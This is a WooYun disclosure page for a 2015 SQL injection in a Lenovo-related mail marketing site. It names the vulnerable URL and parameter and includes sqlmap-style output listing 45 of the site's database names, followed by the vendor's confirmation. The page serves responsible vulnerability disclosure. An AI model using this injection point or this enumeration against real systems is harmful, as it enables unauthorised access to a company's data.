当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127855

漏洞标题:联想某处SQL注入漏洞

相关厂商:联想

漏洞作者: 0x 80

提交时间:2015-07-20 14:43

修复时间:2015-09-04 12:16

公开时间:2015-09-04 12:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

联想某处SQL注入漏洞

详细说明:

2434.png


2348.png


http://email.vips100.com/edm/edms/editor.php?id=-1

漏洞证明:

web application technology: Nginx, PHP 5.4.41
back-end DBMS: MySQL 5.0
[13:50:16] [INFO] fetching database names
[13:50:17] [INFO] the SQL query used returns 45 entries
[13:50:18] [INFO] retrieved: information_schema
[13:50:18] [INFO] retrieved: CLIENT_MOS
[13:50:19] [INFO] retrieved: CMOS_V2
[13:50:19] [INFO] retrieved: SDN_V1
[13:50:19] [INFO] retrieved: analyse
[13:50:20] [INFO] retrieved: blog_development
[13:50:23] [INFO] retrieved: cacti
[13:50:23] [INFO] retrieved: channel_os
[13:50:24] [INFO] retrieved: demo_development
[13:50:24] [INFO] retrieved: extmail
[13:50:24] [INFO] retrieved: ibdata
[13:50:25] [INFO] retrieved: lava
[13:50:25] [INFO] retrieved: ld_bee
[13:50:25] [INFO] retrieved: ld_ess
[13:50:26] [INFO] retrieved: ld_passport
[13:50:26] [INFO] retrieved: ld_vips_edm
[13:50:26] [INFO] retrieved: ld_vips_ent
[13:50:27] [INFO] retrieved: ld_vips_per
[13:50:30] [INFO] retrieved: ld_vips_sina
[13:50:30] [INFO] retrieved: ld_vips_sso
[13:50:31] [INFO] retrieved: le_cloud
[13:50:31] [INFO] retrieved: le_stats
[13:50:32] [INFO] retrieved: lesync
[13:50:32] [INFO] retrieved: logs
[13:50:32] [INFO] retrieved: logserver
[13:50:33] [INFO] retrieved: message
[13:50:36] [INFO] retrieved: mysql
[13:50:37] [INFO] retrieved: mysqlslap
[13:50:37] [INFO] retrieved: orm
[13:50:38] [INFO] retrieved: performance_schema
[13:50:38] [INFO] retrieved: redmine
[13:50:38] [INFO] retrieved: rui_cloud
[13:50:39] [INFO] retrieved: sample_development
[13:50:39] [INFO] retrieved: schedule
[13:50:40] [INFO] retrieved: sendmail
[13:50:40] [INFO] retrieved: sherl
[13:50:42] [INFO] retrieved: sherl_test
[13:50:42] [INFO] retrieved: sina_sso
[13:50:43] [INFO] retrieved: tesla
[13:50:43] [INFO] retrieved: tesla2
[13:50:44] [INFO] retrieved: test
[13:50:44] [INFO] retrieved: tokenbank
[13:50:44] [INFO] retrieved: tokenbank_sina
[13:50:45] [INFO] retrieved: trace
[13:50:48] [INFO] retrieved: usp_v1
available databases [45]:
[*] analyse
[*] blog_development
[*] cacti
[*] channel_os
[*] CLIENT_MOS
[*] CMOS_V2
[*] demo_development
[*] extmail
[*] ibdata
[*] information_schema
[*] lava
[*] ld_bee
[*] ld_ess
[*] ld_passport
[*] ld_vips_edm
[*] ld_vips_ent
[*] ld_vips_per
[*] ld_vips_sina
[*] ld_vips_sso
[*] le_cloud
[*] le_stats
[*] lesync
[*] logs
[*] logserver
[*] message
[*] mysql
[*] mysqlslap
[*] orm
[*] performance_schema
[*] redmine
[*] rui_cloud
[*] sample_development
[*] schedule
[*] SDN_V1
[*] sendmail
[*] sherl
[*] sherl_test
[*] sina_sso
[*] tesla
[*] tesla2
[*] test
[*] tokenbank
[*] tokenbank_sina
[*] trace
[*] usp_v1
[13:50:49] [INFO] fetched data logged to text files under
tput\email.vips100.com'


http://email.vips100.com/edm/edms/editor.php?id=-1

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-21 12:14

厂商回复:

谢谢提交漏洞。
联想于2015年4月启用安全应急响应中心(LSRC),欢迎大家向我们反馈联想产品、服务和业务系统的安全漏洞,以帮助我们提升产品和业务的安全性。相关细则请登录安全应急响应中心站点(http://lsrc点lenovo点com )

最新状态:

暂无


漏洞评价:

评论